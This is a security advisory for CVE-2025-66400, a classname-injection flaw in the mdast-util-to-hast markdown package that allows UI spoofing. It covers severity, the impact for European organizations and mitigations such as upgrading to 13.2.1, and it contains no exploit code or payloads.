CVE-2025-66400 affects the mdast-util-to-hast package, a utility that transforms markdown abstract syntax trees (mdast) into hypertext abstract syntax trees (hast). Between versions 13.0.0 and before 13.2.1, the package improperly validates input when converting markdown to hast, specifically allowing multiple unprefixed classnames to be injected via character references within markdown source code elements. This improper input validation (CWE-20) and the related weakness in improper sanitization (CWE-915) enable an attacker to craft markdown content that, when rendered, causes code elements to adopt classnames that visually blend them with other page elements. This can lead to UI confusion, where malicious or misleading content appears indistinguishable from legitimate page elements, potentially facilitating phishing, misinformation, or user interface manipulation attacks. The vulnerability is exploitable remotely without authentication or user interaction, increasing its risk profile. The CVSS 4.0 vector (AV:N/AC:L/AT:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) reflects network attack vector, low attack complexity, no privileges or user interaction required, and limited impact on integrity (visual appearance) but no impact on confidentiality or availability. The issue was addressed and fixed in version 13.2.1 of mdast-util-to-hast. No public exploits have been reported to date, but the vulnerability's nature warrants prompt patching, especially in environments rendering user-generated markdown content.

For European organizations, the primary impact of this vulnerability lies in the potential for UI spoofing and content confusion within web applications, documentation portals, or any service rendering user-supplied markdown using the affected mdast-util-to-hast versions. Attackers could exploit this flaw to make malicious code snippets or content appear legitimate, undermining user trust and potentially facilitating social engineering or phishing attacks. While the vulnerability does not directly compromise data confidentiality or system availability, the integrity and authenticity of rendered content can be compromised, which is critical in sectors relying on accurate documentation and secure user interfaces, such as finance, healthcare, and government services. Additionally, organizations with compliance obligations around content integrity and user protection may face regulatory scrutiny if exploited. The ease of remote exploitation without authentication increases the risk of widespread abuse, especially in public-facing platforms. However, the absence of known exploits in the wild suggests a window for proactive mitigation.

European organizations should immediately audit their usage of the mdast-util-to-hast package and identify any deployments running versions between 13.0.0 and before 13.2.1. The primary mitigation is to upgrade to version 13.2.1 or later, where the vulnerability is fixed. For environments where immediate upgrading is not feasible, implement input sanitization and validation layers before markdown content is processed, specifically filtering or escaping character references that could inject unprefixed classnames. Additionally, apply Content Security Policy (CSP) headers to restrict the impact of injected classes on styling and behavior. Monitor markdown rendering outputs for unexpected classnames or styling anomalies. Educate developers and content managers about the risks of rendering untrusted markdown content without proper validation. Finally, maintain vigilance for any emerging exploit reports or patches related to this vulnerability.